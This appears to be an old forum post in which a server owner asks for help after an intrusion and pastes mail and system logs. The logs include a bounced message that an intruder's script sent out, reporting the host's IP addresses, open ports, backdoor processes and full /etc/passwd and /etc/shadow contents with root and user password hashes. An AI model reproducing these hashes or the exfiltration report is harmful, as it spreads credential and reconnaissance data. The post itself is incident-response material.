My server box is hacked! help...

I think my server box is hacked !!
help me!..
These are my log files...

This is my maillog...



Jun 27 02:32:02 localhost sendmail[818]: alias database /etc/aliases rebuilt
by root
Jun 27 02:32:02 localhost sendmail[818]: /etc/aliases: 40 aliases, longest
10 bytes, 395 bytes total
Jun 27 02:32:03 localhost sendmail[830]: starting daemon (8.11.3):
SMTP+queueing@01:00:00
Jun 27 02:37:42 localhost sendmail[1422]: h5QHbgU01422: from=root, size=241,
class=0, nrcpts=1, msgid=<200306261737.h5QHbgU01422@localhost.localdo main>,
relay=root@localhost
Jun 27 02:37:42 localhost sendmail[1422]: h5QHbgU01422: to=root,
ctladdr=root (0/0), delay=00:00:00, xdelay=00:00:00, mailer=local,
pri=30241, dsn=2.0.0, stat=Sent
Jun 27 02:49:22 localhost sendmail[901]: alias database /etc/aliases rebuilt
by root
Jun 27 02:49:22 localhost sendmail[901]: /etc/aliases: 40 aliases, longest
10 bytes, 395 bytes total
Jun 27 02:49:23 localhost sendmail[913]: starting daemon (8.11.3):
SMTP+queueing@01:00:00
Jun 27 06:56:49 localhost sendmail[1658]: h5QLunI01658: from=root,
size=11586, class=0, nrcpts=1,
msgid=<200306262156.h5QLunI01658@localhost.localdo main>,
relay=root@localhost
Jun 27 06:56:49 localhost sendmail[1661]: h5QLunc01661: from=root,
size=11589, class=0, nrcpts=1,
msgid=<200306262156.h5QLunc01661@localhost.localdo main>,
relay=root@localhost
Jun 27 06:56:50 localhost sendmail[1666]: h5QLunl01666: from=root,
size=11583, class=0, nrcpts=1,
msgid=<200306262156.h5QLunl01666@localhost.localdo main>,
relay=root@localhost
Jun 27 06:56:51 localhost sendmail[1708]: h5QLunl01666:
to=solistu@yahoo.com, ctladdr=root (0/0), delay=00:00:02, xdelay=00:00:01,
mailer=esmtp, pri=41583, relay=mx2.mail.yahoo.com. [64.156.215.5],
dsn=2.0.0, stat=Sent (ok dirdel)
Jun 27 06:56:52 localhost sendmail[1705]: h5QLunc01661:
to=secretzel@secretzel.org, ctladdr=root (0/0), delay=00:00:03,
xdelay=00:00:02, mailer=esmtp, pri=41589, relay=mx2.bm.vip.sc5.yahoo.com.
[66.163.171.159], dsn=2.0.0, stat=Sent (ok dirdel)
Jun 27 06:56:27 localhost sendmail[1585]: h5QLuR901585: from=root,
size=2096, class=0, nrcpts=1,
msgid=<200306262156.h5QLuR901585@localhost.localdo main>,
relay=root@localhost
Jun 27 06:56:52 localhost sendmail[1706]: h5QLunI01658:
to=mukles@mukles.org, ctladdr=root (0/0), delay=00:00:03, xdelay=00:00:02,
mailer=esmtp, pri=41586, relay=mx2.bm.vip.sc5.yahoo.com. [66.163.171.159],
dsn=5.0.0, stat=Service unavailable
Jun 27 06:56:52 localhost sendmail[1706]: h5QLunI01658: h5QLuqH01706: DSN:
Service unavailable
Jun 27 06:56:52 localhost sendmail[1706]: h5QLuqH01706: to=root,
delay=00:00:00, xdelay=00:00:00, mailer=local, pri=41686, dsn=2.0.0,
stat=Sent



Here, I have never sent emails to solist@yahoo.com ,
secretzel@secretzel.org,
mukles@mukles.org....
I guess that fricking hacker sent these...
These are emails that returned.
It was intended to be sent to mukles@mukles.org..
This contains so many informations about my box. :-(




From root Fri Jun 27 06:56:52 2003
Return-Path: <MAILER-DAEMON@localhost.localdomain>
Received: from localhost (localhost)
by localhost.localdomain (8.11.3/8.11.3) id h5QLuqH01706;
Fri, 27 Jun 2003 06:56:52 +0900
Date: Fri, 27 Jun 2003 06:56:52 +0900
From: Mail Delivery Subsystem <MAILER-DAEMON@localhost.localdomain>
Message-Id: <200306262156.h5QLuqH01706@localhost.localdomain >
To: root@localhost.localdomain
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="h5QLuqH01706.1056664612/localhost.localdomain"
Subject: Returned mail: see transcript for details
Auto-Submitted: auto-generated (failure)
Status: RO

This is a MIME-encapsulated message

--h5QLuqH01706.1056664612/localhost.localdomain

The original message was received at Fri, 27 Jun 2003 06:56:49 +0900
from root@localhost

----- The following addresses had permanent fatal errors -----
mukles@mukles.org
(reason: 554 delivery error: dd Sorry, your message to mukles@mukles.org
cannot be delivered. This account is over quota. -
mta101.bizmail.yahoo.com)

----- Transcript of session follows -----
.... while talking to mx2.bm.vip.sc5.yahoo.com.:
>>> DATA
<<< 554 delivery error: dd Sorry, your message to mukles@mukles.org cannot
be delivered. This account is over quota. - mta101.bizmail.yahoo.com
554 5.0.0 mukles@mukles.org... Service unavailable

--h5QLuqH01706.1056664612/localhost.localdomain
Content-Type: message/delivery-status

Reporting-MTA: dns; localhost.localdomain
Arrival-Date: Fri, 27 Jun 2003 06:56:49 +0900

Final-Recipient: RFC822; mukles@mukles.org
Action: failed
Status: 5.0.0
Remote-MTA: DNS; mx2.bm.vip.sc5.yahoo.com
Diagnostic-Code: SMTP; 554 delivery error: dd Sorry, your message to
mukles@mukles.org cannot be delivered. This account is over quota. -
mta101.bizmail.yahoo.com
Last-Attempt-Date: Fri, 27 Jun 2003 06:56:52 +0900

--h5QLuqH01706.1056664612/localhost.localdomain
Content-Type: message/rfc822

Return-Path: <root>
Received: (from root@localhost)
by localhost.localdomain (8.11.3/8.11.3) id h5QLunI01658
for mukles@mukles.org; Fri, 27 Jun 2003 06:56:49 +0900
Date: Fri, 27 Jun 2003 06:56:49 +0900
From: root <root>
Message-Id: <200306262156.h5QLunI01658@localhost.localdomain >
To: mukles@mukles.org
Subject: BuduRoot

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++
+++++ Informatziile pe care le-ai dorit boss:) +++++
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++

Hostname : localhost.localdomain (218.236.54.89)
Alternative IP : 127.0.0.1
Host : localhost.localdomain

================================================== =============


================================================== =============

Yahoo.com ping:

PING 216.115.108.243 (216.115.108.243) from 218.236.54.89 : 56(84) bytes of
data.
>From 204.157.5.110: Destination Net Unreachable
>From 204.157.5.110: Destination Net Unreachable
>From 204.157.5.110: Destination Net Unreachable
>From 204.157.5.110: Destination Net Unreachable
>From 204.157.5.110: Destination Net Unreachable
>From 204.157.5.110: Destination Net Unreachable

--- 216.115.108.243 ping statistics ---
6 packets transmitted, 0 packets received, +6 errors, 100% packet loss

================================================== =============

Hw info:

CPU Speed: 167.048MHz
CPU Vendor: vendor_id : CyrixInstead
CPU Model: model name : 6x86MX 2.5x Core/Bus Clock
RAM: 189 Mb

================================================== =============

HDD(s):
Filesystem Type Size Used Avail Use% Mounted on
/dev/hda2 ext2 1.4G 379M 960M 29% /

================================================== =============

inetd-ul...

================================================== =============

configurarea ip-urilor..
inet addr:218.236.54.89 Bcast:218.236.54.127
Mask:255.255.255.128
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
inet addr:127.0.0.1 Mask:255.0.0.0

================================================== =============

Ports open:
rpc.statd 558 root 6u IPv4 938 TCP *:32768
(LISTEN)
sshd 732 root 3u IPv4 1115 TCP *:ssh
(LISTEN)
proftpd 855 root 0u IPv4 1711 TCP *:ftp
(LISTEN)
mysqld 922 root 3u IPv4 1859 TCP *:mysql
(LISTEN)
mysqld 924 root 3u IPv4 1859 TCP *:mysql
(LISTEN)
mysqld 925 root 3u IPv4 1859 TCP *:mysql
(LISTEN)
mysqld 926 root 3u IPv4 1859 TCP *:mysql
(LISTEN)
httpd 941 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 941 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 944 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 944 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 945 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 945 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 946 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 946 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 947 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 947 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 948 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 948 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 949 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 949 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 950 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 950 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 951 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 951 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 1387 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 1387 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 1388 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 1388 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 1389 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 1389 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 1390 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 1390 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 1391 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 1391 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 1392 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 1392 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 1393 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 1393 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 1394 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 1394 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 1395 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 1395 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 1396 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 1396 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 1397 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 1397 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 1398 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 1398 root 17u IPv4 1888 TCP *:http
(LISTEN)
httpd 1399 root 16u IPv4 1887 TCP *:https
(LISTEN)
httpd 1399 root 17u IPv4 1888 TCP *:http
(LISTEN)
sh 1466 apache 16u IPv4 1887 TCP *:https
(LISTEN)
sh 1466 apache 17u IPv4 1888 TCP *:http
(LISTEN)
ptrace 1481 apache 16u IPv4 1887 TCP *:https
(LISTEN)
ptrace 1481 apache 17u IPv4 1888 TCP *:http
(LISTEN)
sh 1484 root 16u IPv4 1887 TCP *:https
(LISTEN)
sh 1484 root 17u IPv4 1888 TCP *:http
(LISTEN)
install 1492 root 16u IPv4 1887 TCP *:https
(LISTEN)
install 1492 root 17u IPv4 1888 TCP *:http
(LISTEN)
minilogd 1528 root 16u IPv4 1887 TCP *:https
(LISTEN)
minilogd 1528 root 17u IPv4 1888 TCP *:http
(LISTEN)
ava 1551 root 16u IPv4 1887 TCP *:https
(LISTEN)
ava 1551 root 17u IPv4 1888 TCP *:http
(LISTEN)
smbd 1562 root 10u IPv4 5130 TCP *:10005
(LISTEN)
smbd 1562 root 16u IPv4 1887 TCP *:https
(LISTEN)
smbd 1562 root 17u IPv4 1888 TCP *:http
(LISTEN)
sysinfo 1573 root 16u IPv4 1887 TCP *:https
(LISTEN)
sysinfo 1573 root 17u IPv4 1888 TCP *:http
(LISTEN)
lsof 1638 root 16u IPv4 1887 TCP *:https
(LISTEN)
lsof 1638 root 17u IPv4 1888 TCP *:http
(LISTEN)
grep 1639 root 16u IPv4 1887 TCP *:https
(LISTEN)
grep 1639 root 17u IPv4 1888 TCP *:http
(LISTEN)

================================================== =============

/etc/passwd & /etc/shadow

/etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
nscd:x:28:28:NSCD Daemon:/:/bin/false
apache:x:48:48:Apache:/var/www:/bin/false
mailnull:x:47:47::/var/spool/mqueue:/dev/null
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
snort:x:100:101:Snort:/var/log/snort:/bin/false
ident:x:98:98:pident user:/:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
leemin:x:500:500::/home/leemin:/bin/bash
guest:x:501:501::/home/guest:/bin/bash

/etc/shadow
root:$1$RRV9SSBA$3xsSWK/dXjVL9BChuFvjh1:12230:0:99999:7:::
bin:*:12230:0:99999:7:::
daemon:*:12230:0:99999:7:::
adm:*:12230:0:99999:7:::
lp:*:12230:0:99999:7:::
sync:*:12230:0:99999:7:::
shutdown:*:12230:0:99999:7:::
halt:*:12230:0:99999:7:::
mail:*:12230:0:99999:7:::
news:*:12230:0:99999:7:::
uucp:*:12230:0:99999:7:::
operator:*:12230:0:99999:7:::
games:*:12230:0:99999:7:::
gopher:*:12230:0:99999:7:::
ftp:*:12230:0:99999:7:::
nobody:*:12230:0:99999:7:::
nscd:!!:12230:0:99999:7:::
apache:!!:12230:0:99999:7:::
mailnull:!!:12230:0:99999:7:::
mysql:!!:12230:0:99999:7:::
snort:!!:12230:0:99999:7:::
ident:!!:12230:0:99999:7:::
rpc:!!:12230:0:99999:7:::
rpcuser:!!:12230:0:99999:7:::
xfs:!!:12230:0:99999:7:::
leemin:$1$V7Ef3T5u$RMI38TLJVoUgWugTKDfsj/:12230:0:99999:7:::
guest:$1$dpKeoqUh$06k4I4BqjBUsLRhLjuXvr1:12229:0:9 9999:7:::

================================================== =============

interesting filez:

Mp3-urile

Avi-urile

Mpg-urile

================================================== =============

Hacking Files..
/usr/share/man/man1/perlhack.1.gz
/usr/share/sendmail-cf/hack
/usr/share/sendmail-cf/hack/cssubdomain.m4
/usr/bin/msghack
/usr/lib/perl5/5.6.0/pod/perlhack.pod

Cam asta este tot-ul ... sper sa fie ceva de server-ul asta...:)


--h5QLuqH01706.1056664612/localhost.localdomain--







This is 'messages'






Jun 27 06:56:49 localhost syslogd 1.4-0: restart.
Jun 27 06:56:49 localhost 6¿ù 27 06:56:49 syslog: syslogd startup succeeded
Jun 27 06:56:49 localhost kernel: klogd 1.4-0, log source = /proc/kmsg
started.
Jun 27 06:56:49 localhost kernel: Inspecting /boot/System.map-2.4.2-2wl
Jun 27 06:56:50 localhost 6¿ù 27 06:56:50 syslog: klogd startup succeeded
Jun 27 06:56:50 localhost smbd -D[1720]: error: bind: Address already in use
Jun 27 06:56:50 localhost smbd -D[1720]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 06:56:50 localhost 6¿ù 27 06:56:50 portmap: portmap startup
succeeded
Jun 27 06:56:51 localhost kernel: Loaded 14746 symbols from
/boot/System.map-2.4.2-2wl.
Jun 27 06:56:51 localhost kernel: Symbols match kernel version 2.4.2.
Jun 27 06:56:51 localhost kernel: Loaded 106 symbols from 12 modules.
Jun 27 06:56:52 localhost 6¿ù 27 06:56:24 syslog: syslogd shutdown
succeeded
Jun 27 06:56:26 localhost smbd -D[1562]: log: Server listening on port
10005.
Jun 27 06:56:26 localhost smbd -D[1562]: log: Generating 768 bit RSA key.
Jun 27 06:56:26 localhost smbd -D[1570]: error: bind: Address already in use
Jun 27 06:56:26 localhost smbd -D[1570]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 06:56:28 localhost smbd -D[1562]: log: RSA key generation complete.
Jun 27 06:56:49 localhost smbd -D[1685]: error: bind: Address already in use
Jun 27 06:56:49 localhost smbd -D[1685]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 08:07:15 localhost smbd -D[1783]: error: bind: Address already in use
Jun 27 08:07:15 localhost smbd -D[1783]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 09:34:59 localhost proftpd[1798]: localhost.localdomain
(220.73.24.200[220.73.24.200]) - FTP session opened.
Jun 27 09:34:59 localhost PAM_pwdb[1798]: (ftp) session opened for user
guest by (uid=0)
Jun 27 09:35:12 localhost proftpd[1798]: localhost.localdomain
(220.73.24.200[220.73.24.200]) - FTP session closed.
Jun 27 09:35:12 localhost PAM_pwdb[1798]: (ftp) session closed for user
guest
Jun 27 09:52:15 localhost smbd -D[1848]: error: bind: Address already in use
Jun 27 09:52:15 localhost smbd -D[1848]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 10:46:43 localhost proftpd[1856]: localhost.localdomain
(195.166.231.119[195.166.231.119]) - FTP session opened.
Jun 27 10:46:43 localhost proftpd[1856]: localhost.localdomain
(195.166.231.119[195.166.231.119]) - FTP session closed.
Jun 27 11:37:15 localhost smbd -D[1906]: error: bind: Address already in use
Jun 27 11:37:15 localhost smbd -D[1906]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:15:08 localhost sshd(pam_unix)[1917]: session opened for user root
by (uid=0)
Jun 27 13:16:18 localhost smbd -D[1970]: error: bind: Address already in use
Jun 27 13:16:18 localhost smbd -D[1970]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:16:19 localhost smbd -D[1988]: error: bind: Address already in use
Jun 27 13:16:19 localhost smbd -D[1988]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:16:19 localhost 6¿ù 27 13:16:19 keytable: sh: /usr/bin/(swapd):
±×·± ÆÄÀÏÀ̳ª µð·ºÅ丮°¡ ¾øÀ½
Jun 27 13:16:19 localhost 6¿ù 27 13:16:19 rc: Stopping keytable: succeeded
Jun 27 13:16:19 localhost smbd -D[2008]: error: bind: Address already in use
Jun 27 13:16:19 localhost smbd -D[2008]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:16:19 localhost 6¿ù 27 13:16:19 mysqld: Stopping MySQL:
succeeded
Jun 27 13:16:20 localhost smbd -D[2045]: error: bind: Address already in use
Jun 27 13:16:20 localhost smbd -D[2045]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:16:22 localhost 6¿ù 27 13:16:22 httpd: httpd shutdown succeeded
Jun 27 13:16:22 localhost smbd -D[2073]: error: bind: Address already in use
Jun 27 13:16:22 localhost smbd -D[2073]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:16:22 localhost smbd -D[2088]: error: bind: Address already in use
Jun 27 13:16:22 localhost smbd -D[2088]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:16:22 localhost proftpd[855]: localhost.localdomain - ProFTPD
1.2.1 standalone mode SHUTDOWN
Jun 27 13:16:22 localhost 6¿ù 27 13:16:22 proftpd: proftpd shutdown
succeeded
Jun 27 13:16:23 localhost sshd(pam_unix)[1917]: session closed for user root
Jun 27 13:16:23 localhost 6¿ù 27 13:16:23 sshd: sshd -TERM succeeded
Jun 27 13:16:23 localhost smbd -D[2113]: error: bind: Address already in use
Jun 27 13:16:23 localhost smbd -D[2113]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:16:23 localhost smbd -D[2136]: error: bind: Address already in use
Jun 27 13:16:23 localhost smbd -D[2136]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:16:24 localhost 6¿ù 27 13:16:24 autofs: automount -USR2 succeeded
Jun 27 13:16:27 localhost smbd -D[2165]: error: bind: Address already in use
Jun 27 13:16:27 localhost smbd -D[2165]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:16:27 localhost 6¿ù 27 13:16:27 apmd: apmd shutdown succeeded
Jun 27 13:16:27 localhost smbd -D[2192]: error: bind: Address already in use
Jun 27 13:16:27 localhost smbd -D[2192]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:16:28 localhost smbd -D[2243]: error: bind: Address already in use
Jun 27 13:16:28 localhost smbd -D[2243]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:16:28 localhost 6¿ù 27 13:16:28 dd: 1+0°³ÀÇ ·¹Äڵ带
ÀÔ·ÂÇÏ¿´½À´Ï´Ù
Jun 27 13:16:28 localhost 6¿ù 27 13:16:28 dd: 1+0°³ÀÇ ·¹Äڵ带
Ãâ·ÂÇÏ¿´½À´Ï´Ù
Jun 27 13:16:28 localhost 6¿ù 27 13:16:28 random: Saving random seed:
succeeded
Jun 27 13:16:29 localhost smbd -D[2270]: error: bind: Address already in use
Jun 27 13:16:29 localhost smbd -D[2270]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:16:29 localhost 6¿ù 27 13:16:29 nfslock: rpc.statd shutdown
succeeded
Jun 27 13:16:29 localhost smbd -D[2303]: error: bind: Address already in use
Jun 27 13:16:29 localhost smbd -D[2303]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:16:30 localhost 6¿ù 27 13:16:30 portmap: portmap shutdown
succeeded
Jun 27 13:16:30 localhost kernel: Kernel logging (proc) stopped.
Jun 27 13:16:30 localhost kernel: Kernel log daemon terminating.
Jun 27 13:16:30 localhost smbd -D[2329]: error: bind: Address already in use
Jun 27 13:16:30 localhost smbd -D[2329]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:16:31 localhost 6¿ù 27 13:16:31 syslog: klogd shutdown succeeded
Jun 27 13:16:31 localhost exiting on signal 15
Jun 27 13:18:34 localhost syslogd 1.4-0: restart.
Jun 27 13:18:34 localhost 6¿ù 27 13:18:34 syslog: syslogd startup succeeded
Jun 27 13:18:34 localhost kernel: klogd 1.4-0, log source = /proc/kmsg
started.
Jun 27 13:18:34 localhost kernel: Inspecting /boot/System.map-2.4.2-2wl
Jun 27 13:18:34 localhost 6¿ù 27 13:18:34 syslog: klogd startup succeeded
Jun 27 13:18:35 localhost smbd -D[600]: error: bind: Address already in use
Jun 27 13:18:35 localhost smbd -D[600]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:35 localhost 6¿ù 27 13:18:35 portmap: portmap startup
succeeded
Jun 27 13:18:35 localhost smbd -D[619]: error: bind: Address already in use
Jun 27 13:18:35 localhost smbd -D[619]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:36 localhost rpc.statd[628]: Version 0.3.1 Starting
Jun 27 13:18:36 localhost 6¿ù 27 13:18:36 nfslock: rpc.statd startup
succeeded
Jun 27 13:18:36 localhost kernel: Loaded 14746 symbols from
/boot/System.map-2.4.2-2wl.
Jun 27 13:18:36 localhost kernel: Symbols match kernel version 2.4.2.
Jun 27 13:18:36 localhost kernel: Loaded 11 symbols from 2 modules.
Jun 27 13:18:36 localhost kernel: Linux version 2.4.2-2wl
(root@jhkim.wowlinux.com) (gcc version 2.96 20000731 (Red Hat Linux 7.1
2.96-85)) #1 ±Ý 6¿ù 8 05:21:58 KST 2001
Jun 27 13:18:36 localhost kernel: BIOS-provided physical RAM map:
Jun 27 13:18:36 localhost kernel: BIOS-e820: 000000000009fc00 @
0000000000000000 (usable)
Jun 27 13:18:36 localhost kernel: BIOS-e820: 0000000000000400 @
000000000009fc00 (reserved)
Jun 27 13:18:36 localhost kernel: BIOS-e820: 0000000000010000 @
00000000000f0000 (reserved)
Jun 27 13:18:36 localhost kernel: BIOS-e820: 0000000000010000 @
00000000ffff0000 (reserved)
Jun 27 13:18:36 localhost kernel: BIOS-e820: 000000000bf00000 @
0000000000100000 (usable)
Jun 27 13:18:36 localhost kernel: On node 0 totalpages: 49152
Jun 27 13:18:36 localhost kernel: zone(0): 4096 pages.
Jun 27 13:18:36 localhost kernel: zone DMA has max 32 cached pages.
Jun 27 13:18:36 localhost kernel: zone(1): 45056 pages.
Jun 27 13:18:36 localhost kernel: zone Normal has max 352 cached pages.
Jun 27 13:18:36 localhost kernel: zone(2): 0 pages.
Jun 27 13:18:36 localhost kernel: zone HighMem has max 1 cached pages.
Jun 27 13:18:36 localhost kernel: Kernel command line: auto BOOT_IMAGE=linux
ro root=302 BOOT_FILE=/boot/vmlinuz-2.4.2-2wl
Jun 27 13:18:36 localhost kernel: Initializing CPU#0
Jun 27 13:18:36 localhost kernel: Detected 167.047 MHz processor.
Jun 27 13:18:36 localhost kernel: Console: colour VGA+ 80x25
Jun 27 13:18:36 localhost kernel: Calibrating delay loop... 333.41 BogoMIPS
Jun 27 13:17:38 localhost rc.sysinit: Mounting proc filesystem: succeeded
Jun 27 13:18:36 localhost kernel: Memory: 190220k/196608k available (1567k
kernel code, 6000k reserved, 94k data, 528k init, 0k highmem)
Jun 27 13:17:38 localhost sysctl: net.ipv4.ip_forward = 0
Jun 27 13:18:37 localhost 6¿ù 27 13:18:36 keytable: Loading keymap:
Jun 27 13:18:36 localhost kernel: Checking if this processor honours the WP
bit even in supervisor mode... Ok.
Jun 27 13:17:38 localhost sysctl: net.ipv4.conf.all.rp_filter = 1
Jun 27 13:18:36 localhost smbd -D[642]: error: bind: Address already in use
Jun 27 13:18:37 localhost 6¿ù 27 13:18:36 keytable: sh: /usr/bin/(swapd):
±×·± ÆÄÀÏÀ̳ª µð·ºÅ丮°¡ ¾øÀ½
Jun 27 13:18:36 localhost kernel: Dentry-cache hash table entries: 32768
(order: 6, 262144 bytes)
Jun 27 13:17:38 localhost sysctl: kernel.sysrq = 0
Jun 27 13:18:37 localhost smbd -D[642]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:37 localhost kernel: Buffer-cache hash table entries: 16384
(order: 4, 65536 bytes)
Jun 27 13:17:38 localhost rc.sysinit: Configuring kernel parameters:
succeeded
Jun 27 13:18:37 localhost 6¿ù 27 13:18:37 keytable:
Jun 27 13:18:37 localhost kernel: Page-cache hash table entries: 65536
(order: 7, 524288 bytes)
Jun 27 13:17:38 localhost date: ±Ý 6¿ù 27 13:17:36 KST 2003
Jun 27 13:18:38 localhost 6¿ù 27 13:18:37 keytable:
Jun 27 13:18:37 localhost kernel: Inode-cache hash table entries: 16384
(order: 5, 131072 bytes)
Jun 27 13:17:38 localhost rc.sysinit: Setting clock (localtime): Fri Jun 27
13:17:36 KST 2003 succeeded
Jun 27 13:18:38 localhost 6¿ù 27 13:18:37 rc: Starting keytable: succeeded
Jun 27 13:18:37 localhost kernel: VFS: Diskquotas version dquot_6.5.0
initialized
Jun 27 13:17:38 localhost rc.sysinit: Loading default keymap succeeded
Jun 27 13:18:37 localhost kernel: CPU: Before vendor init, caps: 0080a135
00000000 00000000, vendor = 1
Jun 27 13:17:38 localhost rc.sysinit: Setting default font (lat0-16):
succeeded
Jun 27 13:18:37 localhost kernel: CPU: After vendor init, caps: 0080a135
00000000 00000000 00000004
Jun 27 13:17:38 localhost rc.sysinit: Activating swap partitions: succeeded
Jun 27 13:18:37 localhost kernel: CPU: After generic, caps: 0080a135
00000000 00000000 00000004
Jun 27 13:17:38 localhost rc.sysinit: Setting hostname
localhost.localdomain: succeeded
Jun 27 13:18:37 localhost kernel: CPU: Common caps: 0080a135 00000000
00000000 00000004
Jun 27 13:17:38 localhost fsck: /: clean, 35049/183552 files, 102364/366904
blocks
Jun 27 13:18:38 localhost kernel: CPU: Cyrix 6x86MX 2.5x Core/Bus Clock
stepping 04
Jun 27 13:17:38 localhost rc.sysinit: Checking root filesystem succeeded
Jun 27 13:18:38 localhost kernel: Checking 'hlt' instruction... OK.
Jun 27 13:17:38 localhost rc.sysinit: Remounting root filesystem in
read-write mode: succeeded
Jun 27 13:18:38 localhost 6¿ù 27 13:17:41 rc.sysinit: Finding module
dependencies: succeeded
Jun 27 13:18:38 localhost kernel: POSIX conformance testing by UNIFIX
Jun 27 13:18:39 localhost 6¿ù 27 13:17:41 rc.sysinit: Checking filesystems
succeeded
Jun 27 13:18:38 localhost kernel: mtrr: v1.37 (20001109) Richard Gooch
(rgooch@atnf.csiro.au)
Jun 27 13:18:38 localhost smbd -D[679]: error: bind: Address already in use
Jun 27 13:18:39 localhost 6¿ù 27 13:17:41 rc.sysinit: Mounting local
filesystems: succeeded
Jun 27 13:18:38 localhost kernel: mtrr: detected mtrr type: Cyrix ARR
Jun 27 13:18:39 localhost 6¿ù 27 13:18:38 random: Initializing random
number generator: succeeded
Jun 27 13:18:38 localhost smbd -D[679]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:39 localhost 6¿ù 27 13:17:42 rc.sysinit: Turning on user and
group quotas for local filesystems: succeeded
Jun 27 13:18:38 localhost kernel: PCI: PCI BIOS revision 2.10 entry at
0xfb0c0, last bus=0
Jun 27 13:18:39 localhost 6¿ù 27 13:17:43 rc.sysinit: Enabling swap space:
succeeded
Jun 27 13:18:38 localhost kernel: PCI: Using configuration type 1
Jun 27 13:17:46 localhost init: Entering runlevel: 3
Jun 27 13:18:39 localhost kernel: PCI: Probing PCI hardware
Jun 27 13:17:47 localhost smbd -D[195]: error: bind: Address already in use
Jun 27 13:18:39 localhost kernel: PCI: Using IRQ router PIIX [8086/7110] at
00:01.0
Jun 27 13:17:47 localhost smbd -D[195]: fatal: Bind to port 10005 failed:
Transport endpoint is not connected.
Jun 27 13:18:39 localhost kernel: Limiting direct PCI/PCI transfers.
